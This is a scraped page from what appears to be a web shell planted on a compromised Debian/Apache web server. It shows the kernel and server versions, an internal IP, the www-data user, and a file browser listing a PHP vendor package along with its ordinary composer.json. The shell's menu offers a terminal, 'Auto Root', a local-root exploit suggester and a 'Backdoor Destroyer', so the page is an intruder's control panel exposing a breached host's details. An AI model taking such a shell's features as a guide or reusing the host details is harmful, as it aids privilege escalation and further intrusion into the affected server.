Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
vendor /
sebastian /
environment /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxr-sr-x
2024-03-23 08:47
ChangeLog.md
6.76
KB
-rw-r--r--
2024-03-23 08:47
LICENSE
1.5
KB
-rw-r--r--
2024-03-23 08:47
README.md
1.1
KB
-rw-r--r--
2024-03-23 08:47
SECURITY.md
1.86
KB
-rw-r--r--
2024-03-23 08:47
composer.json
1.06
KB
-rw-r--r--
2024-03-23 08:47
Save
Rename
{ "name": "sebastian/environment", "description": "Provides functionality to handle HHVM/PHP environments", "keywords": ["environment","hhvm","xdebug"], "homepage": "https://github.com/sebastianbergmann/environment", "license": "BSD-3-Clause", "authors": [ { "name": "Sebastian Bergmann", "email": "sebastian@phpunit.de" } ], "support": { "issues": "https://github.com/sebastianbergmann/environment/issues", "security": "https://github.com/sebastianbergmann/environment/security/policy" }, "config": { "platform": { "php": "8.1.0" }, "optimize-autoloader": true, "sort-packages": true }, "prefer-stable": true, "require": { "php": ">=8.1" }, "require-dev": { "phpunit/phpunit": "^10.0" }, "suggest": { "ext-posix": "*" }, "autoload": { "classmap": [ "src/" ] }, "extra": { "branch-alias": { "dev-main": "6.1-dev" } } }